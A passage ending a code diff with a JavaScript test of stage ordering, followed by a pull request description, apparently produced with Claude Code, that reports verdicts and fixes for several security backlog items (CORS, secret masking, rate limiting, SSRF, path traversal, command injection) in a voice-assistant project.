+    const ai = stages.indexOf("action");
+    expect(ti).toBeGreaterThanOrEqual(0);
+    expect(mi).toBeGreaterThan(ti);
+    expect(ai).toBeGreaterThan(mi);
+  });
+});


### PR DESCRIPTION
## What

Closes the last 'In-browser voice testing' item and all 6 ROADMAP 'Security backlog' topics with honest verdicts:

| Topic | Verdict |
|---|---|
| Voice Test Playwright e2e | 3 tests green vs live backend (fake media stream) |
| CORS in --no-auth (#624) | REAL-FIXED — was allow_origins=['*'] on an unauthenticated API; now localhost-only + CHATTY_CORS_ORIGINS override |
| mask_sensitive_data bypass (#626) | REAL-FIXED — key variants (apiKey/Api-Key) + tuple nesting evaded masking; 3 attack tests failed pre-fix |
| Command injection (#631/632/640) | NOT-REAL — body never reaches shell/keypress/url args; pinned by tests |
| Rate limiting (#639) | REAL-FIXED — token bucket per key/IP on /api/v1/command, 429 + Retry-After |
| Models path traversal (#641) | NOT-REAL — #512-era containment covers all handlers; 23 attack tests pin it |
| SSRF DNS rebinding (#644) | REAL-FIXED — TOCTOU was real; resolve_safe_url() IP-pinning, wired into browser_analyst (the LLM-supplied-URL fetch site) |

Bonus finds from verification: Permissions-Policy header blocked getUserMedia in every real browser (fixed to microphone=(self)); hardened Docker image crashed on first run (unwritable wakewords/config.json — fixed).

## Evidence
- Python: full suite green, ruff clean, mypy clean
- Frontend: vitest 44/44, build green, voice_test.spec.ts 3/3 vs live backend
- Docker: image builds, CLI smoke OK, containerized web server serves /health + /api/v1/status (200, v0.2.0), test image removed

🤖 Generated with [Claude Code](https://claude.com/claude-code)